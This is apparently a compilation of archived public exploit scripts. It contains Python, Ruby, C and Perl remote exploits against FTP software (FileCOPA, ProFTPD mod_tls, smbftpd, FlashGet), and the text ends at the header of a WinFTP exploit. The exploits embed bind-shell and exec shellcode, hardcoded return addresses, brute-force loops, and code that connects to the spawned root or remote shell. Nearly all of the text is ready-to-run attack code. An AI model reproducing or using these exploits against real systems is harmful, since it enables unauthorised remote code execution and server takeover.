shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x 48\x4d\x4c\x46"
shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
print response
# At the time of overflow EBX points into our shellcode
payload = 'A' * 2553
# NOP's pad with a 15 byte jump over some junk and the RET address
# Jumps into our shellcode
payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f'
# Address of 'call ebx' from kernel32.dll SP4
payload += struct.pack('<L', 0x7C577B03)
# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll
# But this one is not very reliable like Win2K SP4
#payload += struct.pack('<L', 0x71AB1269)
payload += '\x90' * 83
payload += shellcode
user = 'USER anonymous\r\n'
tsock.send(user)
response = tsock.recv(1024)
print response
passwd = 'PASS \x2c' + payload + '\r\n'
tsock.send(passwd)
response = tsock.recv(1024)
print response
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)
# [2007-03-26]
21 FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
# ================================================== ===========================================
# FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit(2)
# By Umesh Wanve
# ================================================== ===========================================
#
# Date : 05-04-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
#
# We can write some assembly instruction to jump into shellcode. At the time of EIP overwrite, ECX points to our
# hole request(LIST evil). So jumping forward into ECX points to our Shellcode. This was written coz i was learning
# ruby
#
# P.S. This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit and Stroke
#================================================= ==============================================
require 'net/ftp'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xf7"
shellcode += "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x 1f\x7b\x07\x7f"
shellcode += "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x 8f\x83\x17\x0b"
shellcode += "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x 19\xb3\x38\x19"
shellcode += "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\x cc\xd6\xdc\xa8"
shellcode += "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\x a8\x9e\xf9\x6b"
shellcode += "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x 7c\xc1\xc8\x0b"
shellcode += "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\x b9\x8c\x14\xd0"
shellcode += "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\x a8\xd6\x07\x50"
shellcode += "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x 76\x6f\xf0\x82"
shellcode += "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x 21\xd1\xab\xd3"
shellcode += "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x 91\xd1\x71\x61"
shellcode += "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\x a2\x7d\x28\xe8"
shellcode += "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x 12\xcb\x7e\xc9"
shellcode += "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x 8e\x44\x81\xd7"
shellcode += "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x 7e\x67\x92\xd0"
shellcode += "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x 5d\x7c\xba\xad"
shellcode += "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x 09\x31\xee\x7f"
shellcode += "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\x a6\xd3\xad\xd1"
shellcode += "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x 08\xb5\x07\x50"
shellcode += "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x 07\x08\xfc\xdf"
shellcode += "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80"
host="10.217.100.130" #Target address
pad ="A" * 160 # Buffer
eip = "\x63\x37\x57\x7c" #jmp esp from KERNEL32.DLL on Win2000 SP4 English
nop ="\x90" * 12 # Nop Sled
nop1="\x90" * 4
asm ="\x33\xc0\xb0\x10\xc1\xe0\x04\x03\xc8\xff\xe1"
# 33 c0 xor eax, eax
# b0 10 mov al, 10
# c1 e0 04 shl eax,4
# 03 c8 add ecx,eax
# ff e1 jmp ecx
buffer ="A\x20" + pad + eip + nop1 + asm + nop + shellcode +"\r\n" # Our Evil Buffer
ftp = Net::FTP.new(host)
puts "++ Connecting to target...\n"
ftp.login(user="test", passwd="test") # User name and password
ftp.passive = true
sleep(2)
puts "++ Logging in....\n"
sleep(2)
puts "++ Building Malicious Request ....\n"
begin
ftp.list(buffer)
rescue Net::FTPError
$stderr.print "++ Done ...\n"
end
puts "++ Connecting to target on port 4444....\n"
command= "telnet "+ host +" 4444"
system(command)
ftp.close
# [2007-04-06]
21 ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
/*
* *** Anti-modTLS-0day version 2 ***
*
* ProFTPd *.*.* + mod_tls remote-root-0day-exploit
*
* main advantages of this exploit:
* 1) No patched mod_tls versions yet
* 2) This is a preauthentication bug
* 3) Bruteforcing option (eheheheee)
* main disadvantages:
* 2) Target mechanism isn't very well, cause exploitation
* depends on library mapped address, so, there are no
* strict categories.
* 1) Dunno, if there are a lot of proftpd+mod_tls boxes
* outta there.
*
* Bug found by: netris
* exploit written by: netris
*
* -- ADD --
*
* Hi there. Here goes the original exploit written in 2004
* (not in 2006 like some of you would guess), and found by
* netris, not Evgeny Legerov. Big middle fingers to those
* who fight for commercial security shit system.
* Greets to arpunk, pandzilla, c0dak, mcb, c0de, ^sq, disque,
* gamma, djang0 and many others of ex #phenoelit channel.
*
* netris.
*
* mailto: [email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <getopt.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#define CODE_SZ 2322
#define DPORT 21
#define BSET(u,a,b,c,d) u = a*0x1000000;\
u+= b*0x0010000;\
u+= c*0x0000100;\
u+= d*0x0000001;
#define checkz(a) int i;\
for(i=0;i<4;i++){\
if(a[i]<0x20)a[i]=0x20;\
if(a[i]>0x7f)a[i]=0x7f;\
}
int ch,timeout=2,br=0;
struct ADDR{
char *os;
unsigned long call_reg; /* eax or edx */
};
/*bindshell, port 36864, offset 265, buf address is edx */
char shellcode[]="h22ImX522ImHRWPPSRPPaVUWWTBfRJfhdEfXf5YDfPDfh0PDTY 09RUajWY"
"0Loa0toafhoXfYf1LocjxY0Loe0Toe0ToffhH0fYf1Loh0tojj FY0Lok0t"
"ok0tolfht9fXf1Don0TopjyX0Dor0TosjKX0Dou0Tov0ToxjIX 0Doy0Toy"
"G0tozGGfhsCfYf1LozGG0tozGGjZY0LozGGjkX0Doz0TozGGjG X0Doz0To"
"zG0tozGGjAY0LozGf1tozGGG0tozGGjpY0LozG0tozGGjpY0Lo zG0TozGG"
"jfX0DozG0tozGGjRX0DozG0tozGG0TozGj8Y0Loz0tozG0TozG fhlGfYf1"
"LozGGGG0TozGG0TozGj3Y0Loz0tozG0tozGGjuX0DozG0TozGG jyY0LozG"
"0tozGGG0tozGj4Y0Loz0tozG0TozGjqX0Doz0tozG0tozGfhyC fXf1DozG"
"Gf1tozGGjFY0Loz0TozG0TozGjQY0LozGG0tozGj9Y0Loz0Toz G0TozGjY"
"X0DozGG0tozGjFX0Doz0TozG0tozGGjnY0LozG0TozGGjTY0Lo zG0tozGj"
"gY0Loz0TozG0tozGGj4Y0LozG0TozGj9X0DozG0tozGfhKofYf 1Lozf1to"
"zGG0tozGfha5fXf1Dozf1TozGGj4X0Doz0TozGjYY0LozGGGGj HY0LozCn"
"1qGvFXpvzvFxyvFqrNCOf26C9FcSwFR1T1jvFYOofvFfrNdvNj rNZOf2Gv"
"2KCCOf2LvVyvViOfC2KyMOFj629OnA2FOfA29wVivvXxkrK8O2 24xra54v"
"bingsh";
X509 *Create_Death_Certificate(EVP_PKEY **pkey);
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer);
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len);
void setaddr(char *hname, struct sockaddr_in *sap, int port);
void senddata(int sock, char *data);
int shell(char *host,int port, struct sockaddr_in ad);
void help(char *prname);
SSL_CTX *ctx;
SSL *conn;
int sk;
void handler(){
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
close(sk);
exit(0);
}
void step(char *str, int err){
static i;
if(br)
return;
switch(err){
case 0:
fprintf(stderr,"[%03d] %s\n",i+1,str);
i++;break;
case -1:
fprintf(stderr,"[!!!] %s\n",str);
break;
case 1:
fprintf(stderr,"[!!!] %s\n\t",str);
ERR_print_errors_fp(stderr);
}
}
/* Add targets here */
struct ADDR vict[]={
{"Bruteforce mode",0x40202020},
{"Gentoo Linux 1.4 3.2.3-r1 - openssl-0.9.7d",0x40235727},
{"Gentoo Linux 1.4.3.2.3-r1 - default install",0x40283a43},
{0}
};
int main(int argc, char *argv[])
{
int port=DPORT,aa[4];
char *host,*sport,opt;
unsigned long saddr=0;
struct sockaddr_in a;
EVP_PKEY *key;
X509 *cert=NULL;
fprintf(stderr,"--< rebel-proftpd-modtls-0day\n");
fprintf(stderr,"--< netris @ duffsrebelz\n\n");
while((opt=getopt(argc,(void*)argv,"+b:t:x"))!=-1)
switch(opt){
case 't':timeout=atoi(optarg);break;
case 'b':sscanf(optarg,"0x%x",&saddr);break;
case 'x':ch=1;
X509_print_fp(stderr,
Create_Death_Certificate(&key));
exit(0);
default:help(argv[0]);
}
if(argc-optind!=2)
help(argv[0]);
ch=atoi(argv[optind]);
if(host=strchr(argv[optind+1],':')){
if(!isdigit(*(host+1))){
step("weird arguments\n",-1);
exit(-1);
}
host = strtok(argv[optind+1],":");
sport = strtok(NULL,":");
port=atoi(sport);
}else
host=argv[optind+1];
(ch==0)?(br=1):(br=0);
SSL_library_init();
if(br)
fprintf(stderr,
"--< Ready, Steady, GO!!! >:O\n\n");
setaddr(host,&a,port);
if(!saddr)saddr=vict[0].call_reg;
aa[3] = (saddr >> 0) & 0xff;
aa[2] = (saddr >> 8) & 0xff;
aa[1] = (saddr >> 16) & 0xff;
aa[0] = (saddr >> 24) & 0xff;
checkz(aa);
for(;;){
for(;aa[1]<0x7e;aa[1]++){
for(;aa[2]<0x7e;aa[2]++){
for(;aa[3]<0x7e;aa[3]++){
BSET(vict[0].call_reg,aa[0],aa[1],aa[2],aa[3]);
fprintf(stderr,"[0x%08x]\n",vict[0].call_reg);
sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
cert = Create_Death_Certificate(&key);
a.sin_port=htons(port);
a.sin_family=AF_INET;
if((connect(sk,(struct sockaddr*)&a,sizeof(a)))<0){
fprintf(stderr,"[!!!] couldn't connect\n\n");
close(sk);
exit(-1);
}
senddata(sk,"AUTH TLS\n");
ctx = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_use_certificate(ctx, cert);
SSL_CTX_use_PrivateKey(ctx, key);
conn = SSL_new(ctx);
SSL_set_connect_state(conn);
SSL_set_fd(conn,sk);
signal(SIGINT,handler);
step("establishing SSL connection",0);
#ifdef DEBUG
getc(stdin);
#endif
if(SSL_connect(conn)<0){
fprintf(stderr,"[!!!] No SSL enabled on %s\n\n",host);
exit(-1);
}
step("shell spawn...",0);
if(shell(host,36864,a))
exit(0);
step("done, see ya later\n",0);
X509_free(cert);
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
}aa[3]=0x20;
}aa[2]=0x20;
}aa[1]=0x20;
}
return 0;
}
X509 *Create_Death_Certificate(EVP_PKEY **key)
{
FILE *fd;
time_t t;
X509_NAME *subject=NULL;
X509_NAME *issuer=NULL;
ASN1_TIME *tbefore,*tafter;
ASN1_INTEGER *serial;
X509 *dz; /* certificate */
RSA *rsa;
EVP_PKEY *pk;
step("preparing dirty certificate",0);
dz = X509_new();
/* private-key generation */
pk = EVP_PKEY_new();
rsa = RSA_generate_key(1024, RSA_F4, NULL,NULL);
EVP_PKEY_assign_RSA(pk,rsa);
X509_set_pubkey(dz,pk);
/* version/serial */
X509_set_version(dz,0x2); /* version: 3 */
serial = ASN1_INTEGER_new();
ASN1_INTEGER_set(serial,0x01);
X509_set_serialNumber(dz, serial);
/* not-before/notafter validity */
tbefore = ASN1_TIME_new();
tafter = ASN1_TIME_new();
ASN1_TIME_set(tbefore,t=0);
ASN1_TIME_set(tafter,t=60*60*24*366*65);
X509_set_notBefore(dz, tbefore);
X509_set_notAfter(dz, tafter);
/* DN Subject/Issuer */
set_subject(dz,subject,issuer);
/* let's make it self signed */
X509_sign(dz, pk, EVP_md5());
*key=pk;
X509_NAME_free(subject);
ASN1_INTEGER_free(serial);
ASN1_TIME_free(tbefore);
ASN1_TIME_free(tafter);
close(fd);
return dz;
}
/* <soletario> yeah man */
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer)
{
int i;
char dc0de[6000];
memset(dc0de,0,sizeof(dc0de));
for(i=0; i<5000-1; i++)
dc0de[i]='E';
for(i=258; i<258+sizeof(shellcode)-1; i++)
dc0de[i]=shellcode[i-258];
i+=1;
for(; i<3200; i+=4){ /* uhh, rude */
dc0de[i+0]=(vict[ch].call_reg >> 0) & 0xff;
dc0de[i+1]=(vict[ch].call_reg >> 8) & 0xff;
dc0de[i+2]=(vict[ch].call_reg >>16) & 0xff;
dc0de[i+3]=(vict[ch].call_reg >>24) & 0xff;
}
subject = X509_get_subject_name(cert);
issuer = X509_get_issuer_name(cert);
DUF_add_entry(&subject,"host",dc0de,-1);
X509_set_subject_name(cert,subject);
X509_NAME_delete_entry(issuer,0);
X509_set_issuer_name(cert,issuer);
}
/* This function can insert large fields */
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *ne;
ne=X509_NAME_ENTRY_new();
obj=OBJ_txt2obj(field,0);
X509_NAME_ENTRY_set_object(ne,obj);
ASN1_mbstring_ncopy(&ne->value,bytes,len,MBSTRING_ASC,0,0,0);
X509_NAME_add_entry(*subiss,ne,-1,0);
}
void setaddr(char *hname, struct sockaddr_in *sap, int port)
{
struct hostent *hp;
memset(sap,0,sizeof(*sap));
sap->sin_family = AF_INET;
if(!inet_aton(hname,&sap->sin_addr)){
hp = gethostbyname(hname);
if(hp == NULL){
step("unkown host",-1);
return;
}
sap->sin_addr = *(struct in_addr *)hp->h_addr;
}else
sap->sin_addr.s_addr = inet_addr(hname);
sap->sin_port = htons(port);
}
int shell(char *host, int port, struct sockaddr_in ad)
{
u_char buf[4096];
fd_set fds;
int sock;
struct sockaddr_in a=ad;
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
a.sin_family = AF_INET;
a.sin_port = htons(port);
if((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){
step("couldn't connect\n",-1);
close(sock);
if(!br)
handler();
else return 0;
}
signal(SIGINT,SIG_IGN);
fprintf(stderr,"\n--< %s just has been 0wned\n\n",host);
for (;;){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
fprintf(stderr,"\033[31m[duffshell]#\033[0m ");
select(255, &fds, NULL, NULL, NULL);
memset(buf, 0, sizeof(buf));
if (FD_ISSET(sock, &fds)){
read(sock, buf, sizeof(buf));
fprintf(stderr, "%s", buf);
}
if (FD_ISSET(0, &fds)){
read(0, buf, sizeof(buf));
if(strstr(buf,"exit")){
fprintf(stderr,"\n");
return 1;
}
write(sock, buf, strlen(buf));
}
}
}
void senddata(int sock, char *data)
{
int i,c=0,j;
char au[4];
fd_set ff;
struct timeval tm;
int r;
FD_ZERO(&ff);
FD_SET(sock,&ff);
tm.tv_sec = timeout;
tm.tv_usec = 30;
memset(au,0,4);
if(data){
j=0;
send(sock,data,strlen(data),0);
for(;;){
if(!(r=select(sock+1,&ff,NULL,NULL,&tm)))
break;
if((i=read(sock,&c,1))<=0)
break;
}
}
}
void help(char *prname)
{
int i=0;
fprintf(stderr,"usage: %s target hostname:[port]\n",prname);
fprintf(stderr," -t <delay> :delay of data send/recv\n");
fprintf(stderr," -b <addr> :bruteforce starting address\n");
fprintf(stderr," -x :just the payload certificate and exit\n");
fprintf(stderr,"current targets:\n");
for(i=0;vict[i].call_reg;i++)
fprintf(stderr," %d) %s ( %08x )\n",i,
vict[i].os,
vict[i].call_reg);
putc('\n',stderr);
exit(-1);
}
// [2007-08-24]
21 smbftpd 0.96 SMBDirList-function Remote Format String Exploit
/*
* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
*
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
*
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
*
*
* - Jerry Illikainen <[email protected]>
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <unistd.h>
#include <stdlib.h>
#define GOT 0x080591d8 // GOT entry for chdir
#define BSS 0x0805a791 // this is where the jumpcode will be written
#define DEBUG(d) if (debug) d;
#define MAXPATH 255
#define BUFSIZE 512
unsigned int debug = 0;
/* bindshell (port 4444) from metasploit.com
* restricted chars = 0x00 0x0a 0x0d */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xa3"
"\xef\xd7\xdb\x83\xeb\xfc\xe2\xf4\x92\x34\x84\x98\x f0\x85\xd5\xb1"
"\xc5\xb7\x4e\x52\x42\x22\x57\x4d\xe0\xbd\xb1\xb3\x b2\xb3\xb1\x88"
"\x2a\x0e\xbd\xbd\xfb\xbf\x86\x8d\x2a\x0e\x1a\x5b\x 13\x89\x06\x38"
"\x6e\x6f\x85\x89\xf5\xac\x5e\x3a\x13\x89\x1a\x5b\x 30\x85\xd5\x82"
"\x13\xd0\x1a\x5b\xea\x96\x2e\x6b\xa8\xbd\xbf\xf4\x 8c\x9c\xbf\xb3"
"\x8c\x8d\xbe\xb5\x2a\x0c\x85\x88\x2a\x0e\x1a\x5b";
void usage (char *arg)
{
printf("%s [options]\n"
"\t -h <host>\n"
"\t -p <port>\n"
"\t -u <usernmae - default anonymous>\n"
"\t -P <password - default none>\n\n", arg);
exit(1);
}
int sock (int port, char *host)
{
struct hostent *h;
struct sockaddr_in addr;
int s;
if ((h = gethostbyname(host)) == NULL)
{
perror("[!] gethostbyname");
exit(1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("[!] socket");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
memset(addr.sin_zero, '\0', sizeof addr.sin_zero);
if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) == -1)
{
perror("[!] connect");
exit(1);
}
return s;
}
char *s_send (int s, char *m, char *fmt, ...)
{
static char buf[BUFSIZE];
char str[BUFSIZE];
ssize_t nb;
va_list ap;
va_start(ap, fmt);
vsnprintf(str, BUFSIZE-1, fmt, ap);
va_end(ap);
if (send(s, str, strlen(str), 0) == -1)
{
perror("[!] send");
exit(1);
}
DEBUG(printf("send: %s\n", str));
for (;;)
{
nb = recv(s, buf, BUFSIZE-1, 0);
buf[nb-1] = '\0';
if (m == NULL)
return buf;
else if (strstr(buf, m) != NULL)
return buf;
}
}
void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH])
{
unsigned char a[4], b[4];
char *dir = mkd[0];
unsigned int i, offset = 1052, start = 256, base = 4;
int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];
for (i = 0; i <= 4; i++)
{
a[0] = (int)pa >> 24;
a[1] = ((int)pa & 0xff0000) >> 16;
a[2] = ((int)pa & 0xff00) >> 8;
a[3] = (int)pa & 0xff;
b[0] = (int)pb >> 24;
b[1] = ((int)pb & 0xff0000) >> 16;
b[2] = ((int)pb & 0xff00) >> 8;
b[3] = (int)pb & 0xff;
snprintf(dir, MAXPATH-1,
"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
a[3], a[2], a[1], a[0],
a[3] + 1, a[2], a[1], a[0],
a[3] + 2, a[2], a[1], a[0],
a[3] + 3, a[2], a[1], a[0],
b[3] - 12 + start - (base + 4 - (base%4)), offset,
b[2] - b[3] + start, offset + 1,
b[1] - b[2] + start, offset + 2,
b[0] - b[1] + start, offset + 3);
dir = mkd[i];
if (i < 3)
{
pa = (int *)jmpaddr[i];
pb = (int *)jmpc[i];
} else {
pa = (int *)got;
pb = (int *)jmpaddr[0];
}
}
}
int main (int argc, char **argv)
{
int s[2], c, port = 21, pasv[5];
unsigned int i;
char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;
char mkd[5][MAXPATH], sc[2048];
int
got = GOT,
jmpaddr[] = { BSS, BSS+4, BSS+8 },
jmpc[] = {
0x1234ba66, // mov dx, 0x1234 - 66 ba 34 12
0xc2396658, // pop eax - 58
0xe4fffa75 // cmp ax,dx - 66 39 c2
// jne $-4 - 75 fa
// jmp esp - ff e4
};
while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1)
{
switch (c)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
case 'P':
pass = optarg;
break;
case '?':
default:
usage(argv[0]);
break;
}
}
if (host == NULL)
usage(argv[0]);
printf("[+] GOT: %p - .bss (jmpcode): %p\n", (void *)got, (void *)jmpaddr[0]);
fmt(jmpaddr, jmpc, got, mkd);
printf("[+] %s:%d (user: %s pass: %s)\n", host, port, user, pass);
s[0] = sock(port, host);
s_send(s[0], "331", "USER %s\n", user);
p = s_send(s[0], NULL, "PASS %s\n", pass);
if (strstr(p, "230") == NULL)
{
printf("[!] login failed\n");
exit(1);
}
p = s_send(s[0], NULL, "MKD %s\nMKD %s\nMKD %s\n", mkd[0], mkd[1], mkd[2]);
if (strstr(p, "257") == NULL)
{
printf("[!] couldn't make directories\n");
exit(1);
}
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
printf("[+] writing jumpcode\n");
s_send(s[0], NULL, "NLST -R\n");
s_send(s[0], NULL, "RMD %s\nRMD %s\nRMD %s\n", mkd[0], mkd[1], mkd[2]);
close(s[1]);
s_send(s[0], NULL, "MKD %s\n", mkd[3]);
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
memset(sc, 0x90, sizeof(sc)); // some nops before and
memcpy(sc+3, "\x34\x12", 2); // after the "mark"
memcpy(sc+12, shellcode, sizeof(sc)-12);
printf("[+] overwriting GOT entry and sending shellcode\n\n");
s_send(s[0], NULL, "NLST -R%s\n", sc);
return 0;
}
// [2007-10-01]
21 FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07) <[email protected]>
# http://enigmagroup.org/exploits/6240
##
# special thanks to a friend of mine who helped me
use IO::Socket;
####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x 6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x 4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x 6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x 4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x 80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\x e0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x 6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x 03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x 08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################
######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;
#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6
#Settings Return Address
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN
# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
$CUR_SEH_ADDRESS;
#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over
#witch will make it to call our code
$LISTEN_PORT = 21;
################################################## ########################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";
my $serverSocket = new IO::Socket::INET (Listen => 1,
LocalAddr => $HOST,
LocalPort => $LISTEN_PORT,
Proto => 'tcp');
do
{
print "\r\n[~] listening...\r\n";
$clientSocket = $serverSocket->accept();
print "[+] New Connection Recived\r\n";
$clientSocket->send("220 WELCOME!\r\n");
$isPayloadSent = 0;
while($isPayloadSent == 0) {
$clientSocket->recv($recvBuffer,1024);
print "[~] Recived: " . $recvBuffer;
if($recvBuffer =~ /USER/) {
$clientSocket->send("331 Password required for l33t\r\n");
} elsif($recvBuffer =~ /PASS/) {
$clientSocket->send("230 User l33t logged in.\r\n");
} else {
$clientSocket->send("257 \"$PAYLOAD\"\r\n");
print("[+] The payload has been sent...\r\n");
$isPayloadSent = 1;
}
}
$clientSocket->close();
} while (true);
# [2008-08-15]
21 WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################## ##############################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl <host> <username> <password> <target> #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
